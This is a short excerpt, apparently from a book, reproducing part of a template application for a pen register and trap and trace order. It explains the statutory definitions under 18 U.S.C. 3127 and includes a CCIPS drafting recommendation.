Cover art courtesy of Greg Kipper.
[…] It is believed the subject(s) of the investigation may be using the electronic mail address [
[email protected]], in furtherance of the specified offense, and that the information likely to be obtained from the pen/trap device is relevant to the ongoing criminal investigation. [Although not required by law, CCIPS recommends the inclusion within the application of specific and articulable facts that support this conclusion.] 3. A trap and trace device, as defined in Title 18, United States Code, Section 3127, is “a device which captures the incoming electronic or other impulses which identify the originating number of an instrument or device from which a wire or electronic communication was transmitted.” A pen register collects destination information for electronic transmissions. In the traditional telephone context, a pen register and trap and trace device collects origin and destination information such as the telephone numbers dialed for a telephone call.